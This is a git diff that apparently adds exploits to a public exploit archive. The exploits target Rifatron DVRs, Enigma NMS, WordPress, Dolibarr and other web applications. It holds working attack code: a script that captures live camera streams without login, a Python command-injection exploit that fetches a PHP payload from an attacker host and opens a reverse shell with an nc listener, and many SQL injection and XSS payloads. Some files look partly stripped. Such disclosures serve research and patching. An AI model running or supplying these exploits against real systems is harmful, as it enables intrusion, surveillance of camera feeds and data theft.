diff --git a/exploits/cgi/webapps/47368.sh b/exploits/cgi/webapps/47368.sh
new file mode 100755
index 000000000..4bc3182fa
--- /dev/null
+++ b/exploits/cgi/webapps/47368.sh
@@ -0,0 +1,75 @@
+#!/bin/bash
+#
+#
+# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
+#
+#
+# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
+# Product web page: http://www.rifatron.com
+# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
+# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
+# Firmware: <=8.0 (000143)
+#
+#
+# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
+# servicing the security market as a leading CCTV/video surveillance security
+# system manufacturer, specializing in stand-alone digital video recorder since
+# 1998. We are known for marking the first standalone DVR with audio detection
+# and 480 frames per secone(fps) and have been focusing on highend products and
+# large projects in a variety applications and merket. These include government
+# and public services, banking and finance, hotels and entertatinment, retail
+# education, industrial and commercial sectors throughout Europe, Middle East,
+# the U.S. and Asia. Based on the accumulated know-how in the security industry,
+# Rifatron is trying its utmost for the technology development and customer
+# satisfaction to be the best security solution company in the world.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when animate.cgi script is called through Mobile Web Viewer module.
+#
+# Tested on: Embedded Linux
+# Boa/0.94.14rc21
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5532
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
+#
+#
+# 03.09.2019
+#
+
+#{PoC}
+#
+set -euo pipefail
+IFS=$'\n\t'
+if [ "$#" -ne 2 ]; then
+ echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
+ echo "Ex.: $0 10.9.8.7:65432 10"
+ exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
+STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+ echo "Target not vulnerable!"
+ exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+ do echo -ne $x
+ curl "$HOST" -o sequence-$x.jpg -#;
+ sleep 0.6
+ done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc video.mp4 --verbose -1 -f vlc://quit
+#
+#{/PoC}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47363.html b/exploits/multiple/webapps/47363.html
new file mode 100644
index 000000000..053c7c172
--- /dev/null
+++ b/exploits/multiple/webapps/47363.html
@@ -0,0 +1,69 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
+# Date: 21 July 2019 #
+# Author: Mark Cross (@xerubus | mogozobo.com) #
+# Vendor: NETSAS Pty Ltd #
+# Vendor Homepage: https://www.netsas.com.au/ #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
+# Version: Enigma NMS 65.0.0 #
+# CVE-IDs: CVE-2019-16068 #
+# Full write-up: https://www.mogozobo.com/?p=3647 #
+#--------------------------------------------------------------------#
+ _ _
+ ___ (~ )( ~)
+ / \_\ \/ /
+| D_ ]\ \/ -= Enigma CSRF by @xerubus =-
+| D _]/\ \ -= We all have something to hide =-
+ \___/ / /\ \\
+ (_ )( _)
+ @Xerubus
+
+The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47364.py b/exploits/multiple/webapps/47364.py
new file mode 100755
index 000000000..db743e07b
--- /dev/null
+++ b/exploits/multiple/webapps/47364.py
@@ -0,0 +1,66 @@
+#!/usr/bin/python
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS OS Command Injection #
+# NETSAS Pty Ltd Enigma NMS #
+# Date: 21 July 2019 #
+# Author: Mark Cross (@xerubus | mogozobo.com) #
+# Vendor: NETSAS Pty Ltd #
+# Vendor Homepage: https://www.netsas.com.au/ #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
+# Version: Enigma NMS 65.0.0 #
+# CVE-IDs: CVE-2019-16072 #
+# Full write-up: https://www.mogozobo.com/?p=3647 #
+#--------------------------------------------------------------------#
+
+import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
+
+os.system('clear')
+
+print("""\
+ _ _
+ ___ (~ )( ~)
+ / \_\ \/ /
+| D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =-
+| D _]/\ \ -= We all have something to hide =-
+ \___/ / /\ \\
+ (_ )( _)
+ @Xerubus
+ """)
+
+enigma_host = raw_input("Enter Enigma NMS IP address:\t")
+attack_host = raw_input("Enter Attacker IP address:\t")
+rev_sh_port = raw_input("Enter reverse shell port:\t")
+web_svr_port = raw_input("Enter web server port:\t\t")
+user = raw_input("Enter Username:\t\t\t")
+os.system("stty -echo")
+password = raw_input("Enter Password (no echo):\t")
+os.system("stty echo")
+
+enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
+enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+
+print "\n\n[+] Building PHP reverse shell"
+f=open("evil.php","w")
+f.write("& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
+f.close()
+
+# Create simple webserver hosting evil php file
+print "[+] Hosting PHP reverse shell"
+web_svr_port = str(web_svr_port)
+web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)
+
+# Create netcat listener
+print "[+] Creating listener on port " + rev_sh_port
+subprocess.Popen(["nc", "-nvlp", rev_sh_port])
+
+# Send payload to Enigma NMS
+print "[+] Sending payload\n"
+try:
+ r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
+except:
+ pass
+
+print "\n[+] Cleaning up mess..."
+
+# Shut down http server
+os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47365.txt b/exploits/multiple/webapps/47365.txt
new file mode 100644
index 000000000..0cb61aaa9
--- /dev/null
+++ b/exploits/multiple/webapps/47365.txt
@@ -0,0 +1,23 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS search_pattern SQL Injection #
+# Date: 21 July 2019 #
+# Author: Mark Cross (@xerubus | mogozobo.com) #
+# Vendor: NETSAS Pty Ltd #
+# Vendor Homepage: https://www.netsas.com.au/ #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
+# Version: Enigma NMS 65.0.0 #
+# CVE-IDs: CVE-2019-16065 #
+# Full write-up: https://www.mogozobo.com/?p=3647 #
+#--------------------------------------------------------------------#
+ _ _
+ ___ (~ )( ~)
+ / \_\ \/ /
+| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
+| D _]/\ \ -= We all have something to hide =-
+ \___/ / /\ \\
+ (_ )( _)
+ @Xerubus
+
+Request: http:///cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
+Vulnerable Parameter: search_pattern (GET)
+Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
\ No newline at end of file
diff --git a/exploits/php/webapps/47361.pl b/exploits/php/webapps/47361.pl
new file mode 100755
index 000000000..cd46f1626
--- /dev/null
+++ b/exploits/php/webapps/47361.pl
@@ -0,0 +1,91 @@
+#!/usr/bin/perl -w
+#
+# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+#
+# Copyright 2019 (c) Todor Donev
+#
+# Type: Remote
+# Risk: High
+#
+# Solution:
+# Set security headers to web server and no-cache for Cache-Control
+#
+# Simple Attack Scenarios:
+#
+# o This attack can bypass Simple WAF to access restricted content on the web server,
+# something like phpMyAdmin;
+#
+# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+# # ====================================================================================
+# # Author: Todor Donev 2019 (c)
+# # > Host => default-vhost.com
+# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+# # > Content-Type => application/x-www-form-urlencoded
+# # < Connection => close
+# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
+# # < Location => https://default-vhost.com/
+# # < Server => nginx
+# # < Content-Type => text/html; charset=UTF-8
+# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
+# # < Client-Peer => 13.37.13.37:443
+# # < Client-Response-Num => 1
+# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
+# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
+# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
+# # < Client-SSL-Socket-Class => IO::Socket::SSL
+# # < Client-SSL-Warning => Peer certificate not verified
+# # < Client-Transfer-Encoding => chunked
+# # < Strict-Transport-Security => max-age=31536000;
+# # < X-Powered-By => PHP/7.3.9
+# # < X-Redirect-By => WordPress
+# # ====================================================================================
+#
+#
+#
+use strict;
+use v5.10;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+
+
+my $host = shift || '';
+my $attacker = shift || 'default-vhost.com';
+
+
+say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+# ====================================================================================
+# Author: Todor Donev 2019 (c) ";
+if ($host !~ m/^http/){
+say "# e.g. perl $0 https://target:port/ default-vhost.com";
+exit;
+}
+
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(
+ protocols_allowed => ['http', 'https'],
+ ssl_opts => { verify_hostname => 0 }
+ );
+ $browser->timeout(10);
+ $browser->agent($user_agent);
+
+my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
+$request->header("Host" => $attacker);
+my $response = $browser->request($request);
+say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
+say "# > $_ => ", $request->header($_) for $request->header_field_names;
+say "# < $_ => ", $response->header($_) for $response->header_field_names;
+say "# ====================================================================================";
\ No newline at end of file
diff --git a/exploits/php/webapps/47362.txt b/exploits/php/webapps/47362.txt
new file mode 100644
index 000000000..011722ea0
--- /dev/null
+++ b/exploits/php/webapps/47362.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+
+elemid (POST) - Sql injection PoC
+
+
+POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 143
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]
+
+
+
+Parameter: elemid (POST)
+ Type: error-based
+ Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (EXTRACTVALUE)
+ Payload:
+token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
+AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
+(ELT(7549=7549,1))),0x7176787a71))
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload:
+token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
+AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)
\ No newline at end of file
diff --git a/exploits/php/webapps/47366.txt b/exploits/php/webapps/47366.txt
new file mode 100644
index 000000000..e6140d346
--- /dev/null
+++ b/exploits/php/webapps/47366.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Online Appointment SQL Injection
+# Data: 07.09.2019
+# Exploit Author: mohammad zaheri
+# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+Online-Appointment-Booking-System-master/signup.php
+
+
+==========
+Vulnerable Source:
+==========
+Line 52: $name=$_POST['fname'];
+Line 53: $gender=$_POST['gender'];
+Line 54: $dob=$_POST['dob'];
+Line 55: $contact=$_POST['contact'];
+Line 56: $email=$_POST['email'];
+Line 57: $username=$_POST['username'];
+Line 58: $password=$_POST['pwd'];
+Line 59: $prepeat=$_POST['pwdr'];
+Line 62: if (mysqli_query($conn, $sql))
+
+=========
+POC:
+=========
+http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL]
+
+
+
+=========
+Contact Me :
+=========
+Telegram : @m_zhrii
+Email : neoboy503@gmail.com
\ No newline at end of file
diff --git a/exploits/php/webapps/47369.txt b/exploits/php/webapps/47369.txt
new file mode 100644
index 000000000..e7a022f17
--- /dev/null
+++ b/exploits/php/webapps/47369.txt
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: September 09,2019
+# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads
+# Software Link : https://wordpress.org/plugins/sell-downloads/
+# Tested Version: 1.0.86
+# Tested on: Parrot OS, Wordpress 5.1.1
+
+
+# PoC:
+1- Go to "Products for Sale" section
+2- Click on "Add New"
+3- In opend window click on "Add Comment"
+4- Fill comment as "/> or "/>
+5- Click on "Publish" (or "Update" if you editing an existing product)
+6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up.
\ No newline at end of file
diff --git a/exploits/php/webapps/47370.txt b/exploits/php/webapps/47370.txt
new file mode 100644
index 000000000..3301791df
--- /dev/null
+++ b/exploits/php/webapps/47370.txt
@@ -0,0 +1,140 @@
+# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+
+actioncode (POST) - Sql injection PoC
+
+http request:
+
+POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 610
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+
+
+Parameter: actioncode (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+ Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE
+0x28 END))--
+HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+ Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT
+(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
+XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload:
+token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
+AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)--
+jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save
+
+.
+.
+.
+.
+.
+
+demand_reason_id, availability_id (POST) - Sql injection PoC
+
+http request:
+
+POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 471
+Cookie:
+DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
+
+
+
+Parameter: demand_reason_id (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+ Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
+RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28
+END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
+
+ Type: error-based
+ Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+ Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
+OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
+(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
+
+.
+.
+
+Parameter: availability_id (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+ Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28
+END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
+
+ Type: error-based
+ Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+ Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
+(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY
+x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload:
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
+AND (SELECT 9904 FROM
+(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 70a3d4ab2..e8bdd9282 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41708,3 +41708,12 @@ id,file,description,date,author,type,platform,port
47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
+47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
+47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,
+47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple,
+47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple,
+47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,
+47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,
+47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi,
+47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,
+47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,